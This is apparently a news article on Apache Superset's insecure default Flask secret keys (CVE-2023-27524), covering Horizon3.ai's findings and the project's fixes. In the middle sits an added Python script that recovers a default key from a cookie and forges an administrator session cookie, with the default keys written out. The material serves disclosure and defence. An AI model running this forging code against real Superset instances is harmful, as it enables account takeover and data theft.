Apache Superset: A story of insecure default keys, thousands of vulnerable instances, few paying attention

Apache Superset until earlier this year shipped with an insecure default configuration that miscreants could exploit to log in and take over the data visualization application, steal data, and execute malicious code.
The open source application, based on Python's Flask framework, defaulted to a publicly known secret key:
SECRET_KEY = '21thisismyscretkey12eyyh'
In an advisory on Tuesday, security firm Horizon3.ai explained that when a user logs into a Superset instance, the web application sends a session cookie with a user identifier back to the visitor's web browser.
"The web application signs the cookie with a SECRET_KEY, a value that's supposed to be randomly generated and typically stored in a local configuration file," said Naveen Sunkavally, chief architect at Horizon3.ai.
If an attacker knows the value of SECRET_KEY, they can generate and sign cookies themselves, effectively authenticating as the app administrator: the server trusts whatever user identifier a validly signed cookie carries. And it turns out to be trivial to check whether Superset is using the default key with a tool called flask-unsign.
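What that attack looks like in practice, as an added example that is not code from the article, from Horizon3.ai or from the Superset project: a standard-library re-implementation of the cookie signing Flask delegates to itsdangerous (HMAC-SHA1 over a URL-safe base64 payload and timestamp, keyed by an HMAC of SECRET_KEY with the fixed salt "cookie-session"), used first to recover which of the default keys named in this article signed a captured cookie (the check flask-unsign automates) and then to forge an administrator session. The session payload (`_user_id`, as Flask-Login stores it) and the admin user id of 1 are assumptions; real Superset sessions carry more fields, and Flask additionally rejects cookies older than PERMANENT_SESSION_LIFETIME, which is omitted here.

```python
"""Forge and verify Flask session cookies against candidate SECRET_KEY values.

Added example, not the article's or Superset's own code. Mirrors the scheme
Flask's SecureCookieSessionInterface uses via itsdangerous' URLSafeTimedSerializer:
    derived = HMAC-SHA1(secret_key, b"cookie-session")
    sig     = HMAC-SHA1(derived, payload + "." + timestamp)
    cookie  = payload + "." + timestamp + "." + sig
with payload, timestamp and sig as URL-safe base64 without padding.
"""
import base64
import hashlib
import hmac
import json
import secrets
import time
import zlib
from typing import Optional

SALT = b"cookie-session"  # fixed salt Flask passes for the session cookie

# The three default keys this article names. Horizon3.ai searched for a fourth
# (from the documentation) whose value the article does not give.
DEFAULT_KEYS = [
    "21thisismyscretkey12eyyh",              # original Superset default
    "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET",  # default introduced January 2022
    "TEST_NON_DEV_SECRET",                   # docker-compose default
]


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _derive(secret_key: str) -> bytes:
    # Flask configures itsdangerous with key_derivation="hmac", digest_method=sha1
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def _sign(secret_key: str, data: str) -> str:
    return _b64e(hmac.new(_derive(secret_key), data.encode(), hashlib.sha1).digest())


def forge_cookie(secret_key: str, session: dict, now: Optional[int] = None) -> str:
    """Build a session cookie Flask will accept for `session` under `secret_key`."""
    # Flask's tagged JSON reduces to plain compact JSON for str/bool/int values
    body = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    payload = _b64e(body)  # itsdangerous prefixes "." when it zlib-compresses; we never do
    ts = int(time.time()) if now is None else now
    ts_b64 = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    data = f"{payload}.{ts_b64}"
    return f"{data}.{_sign(secret_key, data)}"


def verify_cookie(secret_key: str, cookie: str) -> Optional[dict]:
    """Return the decoded session if `cookie` was signed with `secret_key`, else None."""
    try:
        payload, ts_b64, sig = cookie.rsplit(".", 2)
    except ValueError:
        return None  # not three dot-separated parts
    data = f"{payload}.{ts_b64}"
    if not hmac.compare_digest(_sign(secret_key, data).encode(), sig.encode()):
        return None
    if payload.startswith("."):  # compressed payload, as itsdangerous emits for large sessions
        raw = zlib.decompress(_b64d(payload[1:]))
    else:
        raw = _b64d(payload)
    return json.loads(raw)


def find_default_key(cookie: str, candidates=DEFAULT_KEYS) -> Optional[str]:
    """The flask-unsign check: which known default key, if any, signed this cookie?"""
    for key in candidates:
        if verify_cookie(key, cookie) is not None:
            return key
    return None


def is_default_key(secret_key: str) -> bool:
    """The kind of startup check the article says Superset 2.1 added."""
    return secret_key in DEFAULT_KEYS


def generate_secret_key() -> str:
    """A replacement of the strength Superset's docs suggest (openssl rand -base64 42)."""
    return base64.b64encode(secrets.token_bytes(42)).decode()


if __name__ == "__main__":
    # Constructed scenario: an instance still running on the original default key
    # issues a cookie for an ordinary user (id 7, assumed) after login.
    captured = forge_cookie(DEFAULT_KEYS[0], {"_fresh": True, "_user_id": "7"})
    key = find_default_key(captured)
    print("captured cookie signed with default key:", key)
    # With the key recovered, the attacker mints an admin session (user id 1, assumed).
    admin_cookie = forge_cookie(key, {"_fresh": True, "_user_id": "1"})
    print("server decodes forged cookie as:", verify_cookie(key, admin_cookie))
    # After rotating to a random key every such cookie is rejected.
    print("rejected after key rotation:", verify_cookie(generate_secret_key(), admin_cookie) is None)
```

Rotating SECRET_KEY invalidates every outstanding session, which is exactly what an operator wants after discovering a default key; the `is_default_key` refusal belongs at startup, before the app ever issues a cookie, not in a log line users are expected to read.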
According to Sunkavally, about two-thirds of those using the software didn't generate a new key when setting up Superset: as of October 11, 2021, the application had almost 3,000 instances exposed to the internet, about 2,000 of which relied on the default secret key.
The Apache security team responded the next day and by January 11, 2022, had made some changes, which established a new default secret key:
"CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET"
But this time the app included a check to see whether the new default remained unchanged. If so, the app wrote a warning to its log file, with instructions on how to generate a secure key. Heeding the warning, however, was left to users.
More than a year after this change was made, on February 9, 2023, Horizon3.ai again checked to see how many Superset instances were configuring their app with a public default secret key. This time they expanded their Shodan.io search to four different default keys – the original, the new one, and two others – one from a deployment template and one from the documentation.
And not much had changed. Out of 3,176 Superset instances, 2,124 (~67 percent) were using one of the four default keys.
So Horizon3.ai contacted the Apache security team again. And two weeks later, on February 24, 2023, the project maintainers committed an update that would ship as part of the 2.1 release on April 5, 2023, to "impose harsher measures when a default SECRET_KEY is detected."
The change made it so the app wouldn't start with a default key.
"With this update, many new users of Superset will no longer accidentally shoot themselves in the foot," said Sunkavally, who cautioned that it is still possible to end up with an insecure version of Superset if the software is installed via a docker-compose file or a helm template.
"The docker-compose file contains a new default SECRET_KEY of TEST_NON_DEV_SECRET that we suspect some users will unwittingly run Superset with. Some configurations also set admin/admin as the default credential for the admin user."
The Superset vulnerability was disclosed as CVE-2023-27524 on Monday. Sunkavally said concerned Superset users can check whether their server has a default key with a script that relies on flask-unsign.
The 2,000+ vulnerable Superset instances identified were operated by companies large and small, government agencies, and universities, according to Sunkavally, who added that some of these organizations addressed the vulnerability after being notified about it.
Sunkavally said this episode illustrates that users don't read documentation and don't read logs. "The best approach is to take the choice away from users and require them to take deliberate actions to be purposefully insecure," he said. ®